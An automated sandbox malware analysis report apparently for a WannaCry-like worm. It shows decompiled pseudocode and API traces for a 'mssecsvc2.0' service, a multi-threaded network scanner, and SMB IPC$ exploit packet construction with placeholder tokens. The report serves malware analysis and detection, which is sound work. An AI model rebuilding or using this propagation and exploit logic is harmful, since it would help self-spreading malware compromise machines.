              • Part of subcall function 00401B70: inet_addr.WS2_32(?), ref: 00401B9D
              • Part of subcall function 00401B70: htons.WS2_32(?), ref: 00401BAE
              • Part of subcall function 00401B70: socket.WS2_32(00000002,00000001,00000000), ref: 00401BBE
              • Part of subcall function 00401B70: connect.WS2_32(00000000,00000002,00000010), ref: 00401BD6
              • Part of subcall function 00401B70: send.WS2_32(00000000,0042E544,00000089,00000000), ref: 00401BF1
              • Part of subcall function 00401B70: recv.WS2_32(00000000,?,00000400,00000000), ref: 00401C0C
              • Part of subcall function 00401B70: send.WS2_32(00000000,0042E5D0,0000008C,00000000), ref: 00401C27
              • Part of subcall function 00401B70: recv.WS2_32(00000000,?,00000400,00000000), ref: 00401C42
              • Part of subcall function 00401B70: send.WS2_32(00000000,0042E65C,00000060,00000000), ref: 00401C72
              • Part of subcall function 00401B70: recv.WS2_32(00000000,?,00000400,00000000), ref: 00401C8D
              • Part of subcall function 00401B70: send.WS2_32(00000000,0042E6BC,00000052,00000000), ref: 00401CC8
            • Sleep.KERNEL32(00000BB8), ref: 004075D9
            • _endthreadex.MSVCRT(00000000), ref: 0040760B
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: send$recv$CountSleepTickconnecthtonsinet_addrsocket$_endthreadex_ftolinet_ntoastrncpy
            • String ID:
            • API String ID: 3594311545-0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • htons.WS2_32 ref: 004074BB
            • socket.WS2_32(00000002,00000001,00000006), ref: 004074CA
            • ioctlsocket.WS2_32(00000000,8004667E,00000002), ref: 004074EC
            • connect.WS2_32 ref: 0040750D
            • select.WS2_32(00000000,00000000,00000000,00000000,00000010), ref: 00407522
            • closesocket.WS2_32(00000000), ref: 0040752A
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: closesocketconnecthtonsioctlsocketselectsocket
            • String ID:
            • API String ID: 3058043877-0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 64%
            			E004076B0(short _a4) {
            				void* _t2;
            				short _t8;
            				void* _t9;
            				void* _t10;
            				void* _t11;
            
            				_t8 = _a4;
            				_t2 = E00407480(_t8);
            				_t11 = _t10 + 4;
            				if(_t2 > 0) {
            					__imp___beginthreadex(0, 0, E00407540, _t8, 0, 0);
            					_t9 = _t2;
            					_t11 = _t11 + 0x18;
            					if(_t9 != 0) {
            						if(WaitForSingleObject(_t9, 0x927c0) == 0x102) {
            							TerminateThread(_t9, 0);
            						}
            						CloseHandle(_t9);
            					}
            				}
            				InterlockedDecrement(0x70f86c);
            				__imp___endthreadex(0);
            				return 0;
            			}

            APIs
              • Part of subcall function 00407480: htons.WS2_32 ref: 004074BB
              • Part of subcall function 00407480: socket.WS2_32(00000002,00000001,00000006), ref: 004074CA
            • _beginthreadex.MSVCRT ref: 004076D0
            • WaitForSingleObject.KERNEL32(00000000,000927C0), ref: 004076E5
            • TerminateThread.KERNEL32(00000000,00000000), ref: 004076F5
            • CloseHandle.KERNEL32(00000000), ref: 004076FC
            • InterlockedDecrement.KERNEL32(0070F86C), ref: 00407707
            • _endthreadex.MSVCRT(00000000), ref: 0040770F
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: CloseDecrementHandleInterlockedObjectSingleTerminateThreadWait_beginthreadex_endthreadexhtonssocket
            • String ID:
            • API String ID: 407422849-0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00408000() {
            				int _t1;
            
            				 *0x431430 = 0x20;
            				 *0x431434 = 2;
            				 *0x431438 = 1;
            				 *0x43143c = 0;
            				 *0x431440 = 0;
            				 *0x431444 = 0;
            				 *0x431448 = 0;
            				_t1 = RegisterServiceCtrlHandlerA("mssecsvc2.0", E00407F30);
            				 *0x43145c = _t1;
            				if(_t1 != 0) {
            					 *0x431434 = 4;
            					 *0x431444 = 0;
            					 *0x431448 = 0;
            					SetServiceStatus(_t1, 0x431430);
            					_t1 = E00407BD0();
            					Sleep(0x5265c00);
            					ExitProcess(1);
            				}
            				return _t1;
            			}

            APIs
            • RegisterServiceCtrlHandlerA.ADVAPI32(mssecsvc2.0,Function_00007F30), ref: 00408043
            • SetServiceStatus.ADVAPI32(00000000,00431430), ref: 0040806E
            • Sleep.KERNEL32(05265C00), ref: 0040807E
            • ExitProcess.KERNEL32 ref: 00408086
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: Service$CtrlExitHandlerProcessRegisterSleepStatus
            • String ID: mssecsvc2.0
            • API String ID: 593436849-3729025388
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 58%
            			E00407BD0() {
            				void* _t1;
            				void* _t2;
            				void* _t3;
            				void* _t7;
            				void* _t10;
            				intOrPtr* _t11;
            				void* _t13;
            				void* _t14;
            				void* _t16;
            				void* _t19;
            				void* _t20;
            
            				_t1 = E00407B90();
            				if(_t1 != 0) {
            					_t11 = __imp___beginthreadex;
            					_t2 =  *_t11(0, 0, E00407720, 0, 0, 0, _t10, _t13, _t16, _t7);
            					_t20 = _t19 + 0x18;
            					if(_t2 != 0) {
            						CloseHandle(_t2);
            					}
            					_t14 = 0;
            					do {
            						_t3 =  *_t11(0, 0, E00407840, _t14, 0, 0);
            						_t20 = _t20 + 0x18;
            						if(_t3 != 0) {
            							CloseHandle(_t3);
            						}
            						Sleep(0x7d0);
            						_t14 = _t14 + 1;
            					} while (_t14 < 0x80);
            					return 0;
            				} else {
            					return _t1;
            				}
            			}

            APIs
              • Part of subcall function 00407B90: WSAStartup.WS2_32(00000202), ref: 00407BA0
            • _beginthreadex.MSVCRT ref: 00407BF3
            • CloseHandle.KERNEL32(00000000), ref: 00407C03
            • _beginthreadex.MSVCRT ref: 00407C1B
            • CloseHandle.KERNEL32(00000000), ref: 00407C25
            • Sleep.KERNEL32(000007D0), ref: 00407C2C
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: CloseHandle_beginthreadex$SleepStartup
            • String ID:
            • API String ID: 3130858798-0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 95%
            			E00408E50(signed int _a4, signed int _a8) {
            				signed int _v0;
            				signed int _v4;
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				signed int _v20;
            				intOrPtr _v40;
            				signed int _v52;
            				signed int _t47;
            				signed int _t49;
            				signed int _t50;
            				void* _t52;
            				signed int _t57;
            				signed int _t58;
            				signed int _t59;
            				intOrPtr _t66;
            				signed int _t68;
            				signed int _t69;
            				signed int _t77;
            				signed int _t78;
            				signed int _t87;
            				intOrPtr _t101;
            				intOrPtr _t105;
            				intOrPtr _t108;
            				signed int* _t111;
            				signed int _t112;
            				signed int _t113;
            				signed int _t114;
            				signed int* _t116;
            				signed int* _t117;
            
            				_t116 =  &_v8;
            				_t47 = _a8;
            				_push(_t47);
            				L004097F8();
            				_t112 = _t47;
            				_push(_a8);
            				L004097F8();
            				_t114 = _t47;
            				_t68 = _t112;
            				_v12 = _t114;
            				_a4 = _t68;
            				if(_t112 <= _t114) {
            					_t113 = _v4;
            					do {
            						_t49 = _t68 & 0x000000ff;
            						if(_t49 != 0 && _t49 != 0xff) {
            							_push(_t68);
            							L004097F2();
            							_v4 = _t49;
            							_t50 =  *(_t113 + 8);
            							_t111 = _t50;
            							if( *((intOrPtr*)(_t113 + 0xc)) - _t50 >> 2 >= 1) {
            								if(_t50 - _t111 >> 2 >= 1) {
            									_v0 = _t50 - 4;
            									E00409050(_t50 - 4, _t50, _t50);
            									_t77 =  *(_t113 + 8);
            									_t52 = _t77 - 4;
            									if(_t111 == _t52) {
            										L25:
            										_t49 =  &(_t111[1]);
            										if(_t111 == _t49) {
            											L27:
            											 *(_t113 + 8) =  *(_t113 + 8) + 4;
            											goto L28;
            										} else {
            											goto L26;
            										}
            										do {
            											L26:
            											 *_t111 = _v4;
            											_t111 =  &(_t111[1]);
            										} while (_t111 != _t49);
            										goto L27;
            									} else {
            										goto L24;
            									}
            									do {
            										L24:
            										_t101 =  *((intOrPtr*)(_t52 - 4));
            										_t52 = _t52 - 4;
            										_t77 = _t77 - 4;
            										 *_t77 = _t101;
            									} while (_t52 != _t111);
            									goto L25;
            								}
            								E00409050(_t111, _t50,  &(_t111[1]));
            								E00409080( *(_t113 + 8), 1 - ( *(_t113 + 8) - _t111 >> 2),  &_v16);
            								_t49 =  *(_t113 + 8);
            								if(_t111 == _t49) {
            									goto L27;
            								} else {
            									goto L21;
            								}
            								do {
            									L21:
            									 *_t111 = _v4;
            									_t111 =  &(_t111[1]);
            								} while (_t111 != _t49);
            								goto L27;
            							}
            							_t105 =  *((intOrPtr*)(_t113 + 4));
            							if(_t105 == 0) {
            								L7:
            								_t78 = 1;
            								L8:
            								if(_t105 != 0) {
            									_t57 = _t50 - _t105 >> 2;
            								} else {
            									_t57 = 0;
            								}
            								_t58 = _t57 + _t78;
            								_v20 = _t58;
            								if(_t58 < 0) {
            									_t58 = 0;
            								}
            								_t59 = _t58 << 2;
            								_push(_t59);
            								L00409A10();
            								_t115 =  *((intOrPtr*)(_t113 + 4));
            								_t117 =  &(_t116[1]);
            								_v8 = _t59;
            								_t69 = _t59;
            								if( *((intOrPtr*)(_t113 + 4)) == _t111) {
            									L15:
            									E00409080(_t69, 1,  &_v4);
            									E00409050(_t111,  *(_t113 + 8), _t69 + 4);
            									E004097FE(E00409040( *(_t113 + 8),  *((intOrPtr*)(_t113 + 4)),  *(_t113 + 8)),  *((intOrPtr*)(_t113 + 4)));
            									_t108 = _v40;
            									_t116 =  &(_t117[1]);
            									_t66 =  *((intOrPtr*)(_t113 + 4));
            									 *((intOrPtr*)(_t113 + 0xc)) = _t108 + _v52 * 4;
            									if(_t66 != 0) {
            										_t87 =  *(_t113 + 8) - _t66 >> 2;
            									} else {
            										_t87 = 0;
            									}
            									_t114 = _v16;
            									_t68 = _v0;
            									_t49 = _t108 + 4 + _t87 * 4;
            									 *((intOrPtr*)(_t113 + 4)) = _t108;
            									 *(_t113 + 8) = _t49;
            									goto L28;
            								} else {
            									do {
            										E004090B0(_t69, _t115);
            										_t115 =  &_a4;
            										_t117 =  &(_t117[2]);
            										_t69 = _t69 + 4;
            									} while ( &_a4 != _t111);
            									goto L15;
            								}
            							}
            							_t78 = _t50 - _t105 >> 2;
            							if(_t78 > 1) {
            								goto L8;
            							}
            							goto L7;
            						}
            						L28:
            						_t68 = _t68 + 1;
            						_a4 = _t68;
            					} while (_t68 <= _t114);
            					return _t49;
            				}
            				return _t47;
            			}

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: htonl$??2@
            • String ID:
            • API String ID: 152249050-0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 81%
            			E004017B0(void* __eflags) {
            				intOrPtr _t39;
            				intOrPtr _t41;
            				void* _t57;
            				char* _t68;
            				signed int _t74;
            				signed int _t80;
            				signed int _t92;
            				signed int _t93;
            				signed int _t102;
            				signed int _t107;
            				signed int _t115;
            				signed int _t116;
            				unsigned int _t124;
            				unsigned int _t127;
            				void* _t163;
            				void* _t164;
            				void* _t169;
            				void* _t172;
            				unsigned int _t174;
            				void* _t176;
            				void* _t177;
            				void* _t178;
            				void* _t179;
            				void* _t181;
            				void* _t183;
            				void* _t187;
            
            				 *((char*)(_t176 + 0x18)) = 0;
            				memset(_t176 + 0x19, 0, 0x31 << 2);
            				_t177 = _t176 + 0xc;
            				asm("stosw");
            				asm("stosb");
            				_t68 = _t177 + 0x18;
            				_t62 = 0x5f;
            				sprintf(_t68, "\\\\%s\\IPC$",  *((intOrPtr*)(_t177 + 0x4e4)));
            				asm("repne scasb");
            				_t71 =  !(_t68 | 0xffffffff) - 1;
            				_t174 =  !(_t68 | 0xffffffff) - 1 + 1;
            				_t39 = E00401140( !(_t68 | 0xffffffff) - 1, 0x42e494, "__USERID__PLACEHOLDER__", 0x5f);
            				_t178 = _t177 + 0x18;
            				 *((intOrPtr*)(_t178 + 0x10)) = _t39;
            				if(_t39 != 0) {
            					_t127 = _t39 - 0x42e494;
            					_t102 = _t127 >> 2;
            					_t57 = memcpy(0x42e494 + _t102 + _t102, 0x42e494, memcpy(_t178 + 0xe0, 0x42e494, _t102 << 2) & 0x00000003);
            					_t187 = _t178 + 0x18;
            					_t107 =  *_t57;
            					 *(_t187 + _t127 + 0xe0) = _t107;
            					 *((char*)(_t187 + _t127 + 0xe1)) =  *((intOrPtr*)(_t57 + 1));
            					asm("repne scasb");
            					asm("repne scasb");
            					_t172 =  !( !(_t107 | 0xffffffff) - 0x00000001 | 0xffffffff) - 1 +  *((intOrPtr*)(_t187 + 0x10));
            					_t115 = 0x5f - _t127;
            					_t116 = _t115 >> 2;
            					memcpy(_t187 + _t127 + 0xe2, _t172, _t116 << 2);
            					memcpy(_t172 + _t116 + _t116, _t172, _t115 & 0x00000003);
            					_t178 = _t187 + 0x18;
            					asm("repne scasb");
            					_t71 = 0xbadbac;
            					_t62 = 0x61;
            				}
            				_t41 = E00401140(_t71, _t178 + 0xe4, "__TREEPATH_REPLACE__", _t62);
            				_t179 = _t178 + 0xc;
            				 *((intOrPtr*)(_t179 + 0x10)) = _t41;
            				if(_t41 != 0) {
            					_t124 = _t41 - _t179 + 0xe0;
            					_t163 = _t179 + 0xe0;
            					_t74 = _t124 >> 2;
            					memcpy(_t163 + _t74 + _t74, _t163, memcpy(0x42e494, _t163, _t74 << 2) & 0x00000003);
            					_t181 = _t179 + 0x18;
            					_t164 = _t181 + 0x18;
            					_t26 = 0x42e494 + _t124; // 0x42e494
            					_t80 = _t174 >> 2;
            					memcpy(_t164 + _t80 + _t80, _t164, memcpy(_t26, _t164, _t80 << 2) & 0x00000003);
            					_t183 = _t181 + 0x18;
            					asm("repne scasb");
            					asm("repne scasb");
            					 *(_t183 + 0x14) = _t62 - _t124;
            					_t169 = 0xbadbac +  *((intOrPtr*)(_t183 + 0x10));
            					_t92 =  *(_t183 + 0x14);
            					_t32 = 0x42e494 + _t174; // 0x42e494
            					_t93 = _t92 >> 2;
            					memcpy(_t124 + _t32, _t169, _t93 << 2);
            					memcpy(_t169 + _t93 + _t93, _t169, _t92 & 0x00000003);
            					asm("repne scasb");
            					_t62 = _t62 + _t174 - 0xbadbac;
            				}
            				 *0x42e497 = _t62 - 4;
            				return _t62;
            			}

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: sprintf
            • String ID: \\%s\IPC$$__TREEPATH_REPLACE__$__USERID__PLACEHOLDER__
            • API String ID: 590974362-3739929053
            • Opcode ID: 8a71566191ccf39690d414baa018c0f0f4a24144a8cbb20510a2571041c156f4
            • Instruction ID: 87eaab73753a0df69db57b4304ef99bcc9305a721015e4a4d2ea0bcfc63ae1aa
            • Opcode Fuzzy Hash: 8a71566191ccf39690d414baa018c0f0f4a24144a8cbb20510a2571041c156f4
            • Instruction Fuzzy Hash: EB41D7327046450BC71CD93898516AF7AC2B7C8360F944B3EB95BF36D2DEE89D09C289
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 46%
            			E00408200(char* __ecx, intOrPtr* _a4, intOrPtr* _a8) {
            				intOrPtr* _t17;
            				void* _t29;
            				intOrPtr* _t30;
            				char* _t33;
            				intOrPtr* _t34;
            				void* _t35;
            				void* _t36;
            
            				_t33 = __ecx;
            				 *__ecx =  *_a8;
            				_t17 =  *_a4;
            				 *((char*)(__ecx + 1)) = _t17;
            				 *((char*)(__ecx + 8)) = 0;
            				L00409A10();
            				_t30 = _t17;
            				_t36 = _t35 + 4;
            				_t34 = _t30;
            				 *((intOrPtr*)(_t30 + 4)) = 0;
            				 *((intOrPtr*)(_t30 + 0x14)) = 1;
            				__imp__??0_Lockit@std@@QAE@XZ(0x18, _t29);
            				if( *0x70f878 == 0) {
            					 *0x70f878 = _t30;
            					 *_t30 = 0;
            					_t34 = 0;
            					 *((intOrPtr*)( *0x70f878 + 8)) = 0;
            				}
            				 *0x70f874 =  *0x70f874 + 1;
            				__imp__??1_Lockit@std@@QAE@XZ();
            				if(_t34 != 0) {
            					_t17 = E004097FE(_t17, _t34);
            					_t36 = _t36 + 4;
            				}
            				_push(0x18);
            				L00409A10();
            				 *((intOrPtr*)(_t17 + 4)) =  *0x70f878;
            				 *((intOrPtr*)(_t17 + 0x14)) = 0;
            				 *((intOrPtr*)(_t33 + 4)) = _t17;
            				 *((intOrPtr*)(_t33 + 0xc)) = 0;
            				 *_t17 = _t17;
            				_t14 = _t33 + 4; // 0x0
            				 *((intOrPtr*)( *_t14 + 8)) =  *_t14;
            				return _t33;
            			}

            0x0040820b
            0x00408210
            0x00408212
            0x00408218
            0x0040821b
            0x0040821e
            0x00408223
            0x00408225
            0x0040822c
            0x0040822e
            0x00408231
            0x00408238
            0x00408244
            0x00408246
            0x0040824c
            0x00408254
            0x00408256
            0x00408256
            0x00408260
            0x0040826a
            0x00408272
            0x00408275
            0x0040827a
            0x0040827a
            0x00408283
            0x00408285
            0x0040828a
            0x0040828d
            0x00408290
            0x00408293
            0x00408296
            0x00408298
            0x0040829e
            0x004082a7

            APIs
            • ??2@YAPAXI@Z.MSVCRT ref: 0040821E
            • ??0_Lockit@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00401005), ref: 00408238
            • ??1_Lockit@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00401005), ref: 0040826A
            • ??2@YAPAXI@Z.MSVCRT ref: 00408285
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: ??2@Lockit@std@@$??0_??1_
            • String ID:
            • API String ID: 1660098694-0
            • Opcode ID: 9565fa150f8d55eb40344cda65b16be015eeb019920554359c80d150c1b404bb
            • Instruction ID: ed6257cba21c300c3bd1b00d2b9572d6b1f2bc40cebacaef3d4e525a17ff9f7a
            • Opcode Fuzzy Hash: 9565fa150f8d55eb40344cda65b16be015eeb019920554359c80d150c1b404bb
            • Instruction Fuzzy Hash: FB1190B1504345CFC310DF69E984A82FBE4EF94300B14C47EE189977A2DB75E888CB96
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E004090D0(void* __eax, intOrPtr _a4) {
            				intOrPtr _v0;
            				intOrPtr _t5;
            				intOrPtr _t10;
            
            				_t10 = _a4;
            				_push(_t10);
            				L004097F8();
            				_t5 = _a4;
            				_push(_t5);
            				L004097F8();
            				if(_t5 > __eax) {
            					L3:
            					return 0;
            				} else {
            					_push(_t10);
            					L004097F8();
            					_push(_v0);
            					L004097F8();
            					if(_t5 > _t5) {
            						goto L3;
            					} else {
            						return 1;
            					}
            				}
            			}

            0x004090d1
            0x004090d6
            0x004090d7
            0x004090de
            0x004090e2
            0x004090e3
            0x004090ea
            0x0040910b
            0x0040910e
            0x004090ec
            0x004090ec
            0x004090ed
            0x004090f8
            0x004090f9
            0x00409100
            0x00000000
            0x00409103
            0x00409109
            0x00409109
            0x00409100

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: htonl
            • String ID:
            • API String ID: 2009864989-0
            • Opcode ID: 974404ef13c792f6d60e4639a8e2796aadad80cb73d53d8352a315d354e0b97a
            • Instruction ID: b9a91dcc1a6b66c5179df083d6ddaca1aa23fca62ef21b8c4899d7e242e77a13
            • Opcode Fuzzy Hash: 974404ef13c792f6d60e4639a8e2796aadad80cb73d53d8352a315d354e0b97a
            • Instruction Fuzzy Hash: 45E0483361426156D720FF2DA8948CF92C89FC53A0B05053BF411F7242D578DC41526B
            Uniqueness

            Uniqueness Score: -1.00%